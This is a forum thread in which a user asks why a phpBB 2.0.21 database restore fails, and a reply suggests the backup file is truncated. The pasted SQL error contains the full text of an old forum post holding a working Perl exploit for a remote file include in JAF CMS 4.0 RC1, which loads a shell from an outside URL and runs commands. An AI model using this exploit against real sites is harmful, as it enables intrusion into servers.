phpBB error

apps

#1

Hi

i have a forum cyanid3.co.uk i have done a full backup of the database it is phpBB 2.0.21 i have now a new forum cyanid3.net but every time i try to restore the database on the ofrum i get this error :-

( the new new forum installed is 2.0.21 )

Error importing backup file

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘85’, ‘aa4d5778f8’, ‘MS Internet Explorer (VML) DoS &’ at line 1

INSERT INTO phpbb_posts_text (post_id, bbcode_uid, post_subject, post_text) VALUES(‘84’, ‘b6d260c40c’, ‘JAF CMS <= 4.0 RC1 Remote File Include Exploit’, 'Exploit Release Date = 03 / 10 / 2006 [code:1:b6d260c40c]#!/usr/bin/perl use Tk; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "DEVIL TEAM :: JAF CMS <= 4.0 RC1 Remote File Include Exploit :: by Kacper :wink: " ); $mw->geometry ( ‘500x300’ ) ; $mw->resizable(0,0); $mw->Label(-text => ‘JAF CMS <= 4.0 RC1 Remote File Include Exploit by Kacper’, -font => ‘{Verdana} 7 bold’,-foreground=>‘blue’)->pack(); $mw->Label(-text => ‘’)->pack(); $fleft=$mw->Frame()->pack ( -side => ‘left’, -anchor => ‘ne’) ; $fright=$mw->Frame()->pack ( -side => ‘left’, -anchor => ‘nw’) ; $url = ‘http://www.site.com/[JAF_path]/module/forum/forum.php?fd=hack&website=’; $shell_path = 'http://server/shell.txt?’; $cmd = ‘ls -la’; $fleft->Label ( -text => 'Script Path: ', -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ; $fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8’, -textvariable => \$url) ->pack ( -side => “top” , -anchor => ‘w’ ) ; $fleft->Label ( -text => 'Shell Path: ', -font => ‘{Verdana} 8 bold’ ) ->pack ( -side => “top” , -anchor => ‘e’ ) ; $fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8’, -textvariable => \$shell_path) ->pack ( -side => “top” , -anchor => ‘w’ ) ; $fleft->Label ( -text => 'CMD: ', -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ; $fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8’, -textvariable => \$cmd) ->pack ( -side => “top” , -anchor => ‘w’ ) ; $fright->Label( -text => ’ ')->pack(); $fleft->Label( -text => ’ ')->pack(); $fright->Button(-text => ‘Exploit Include Vulnerability’, -relief => “groove”, -width => ‘30’, -font => ‘{Verdana} 8 bold’, -activeforeground => ‘red’, -command => \&akcja )->pack(); $fright->Label( -text => ’ ')->pack(); $fright->Label( -text => ‘Exploit coded by Kacper’, -font => ‘{Verdana} 7’)->pack(); $fright->Label( -text => ‘DEVIL TEAM :: The Best Polish Team’, -font => ‘{Verdana} 7’)->pack(); $fright->Label( -text => ‘http://www.rahim.webd.pl/’, -font => ‘{Verdana} 7’)->pack(); MainLoop(); sub akcja() { $InfoWindow=$mw->DialogBox(-title => 'DEVIL TEAM :: Exploit by Kacper :wink: ', -buttons => [“OK”]); $InfoWindow->add(‘Label’, -text => ‘Enter to DEVIL TEAM IRC CHANNEL: 72.20.18.6:6667 #devilteam’, -font => ‘{Verdana} 8’)->pack; $InfoWindow->add(‘Label’, -text => ‘’, -font => ‘{Verdana} 8’)->pack; $InfoWindow->add(‘Label’, -text => ‘DEVIL TEAM SITE: http://www.rahim.webd.pl/’, -font => ‘{Verdana} 8’)->pack; $InfoWindow->add(‘Label’, -text => ‘’, -font => ‘{Verdana} 8’)->pack; $InfoWindow->add(‘Label’, -text => ‘’, -font => ‘{Verdana} 8’)->pack; $InfoWindow->add(‘Label’, -text => ‘Greetz For my friends ;-)’, -font => ‘{Verdana} 8’)->pack; $InfoWindow->add(‘Label’, -text => ‘’, -font => ‘{Verdana} 8’)->pack; system(“start $url$shell_path$cmd”); $InfoWindow->Show(); } INSERT INTO phpbb_posts_text (post_id, bbcode_uid, post_subject, post_text) VALUES(‘85’, ‘aa4d5778f8’, 'MS Internet Explorer (VML) DoS &

Line : 980
File : admin_db_utilities.php

can any 1 pls help me i have looked and tried so many things :frowning:


#2

Is the sql file you are importing truncated, or did it just abort when inserting the second record? I can’t tell which is the case, but you do realize that the second record only has 3 of the 4 fields in the record in the code you provided, and that code just “ends” with no “;” or anything else.

Have you looked at the contents of the import file to see that it is all there?

–rlparker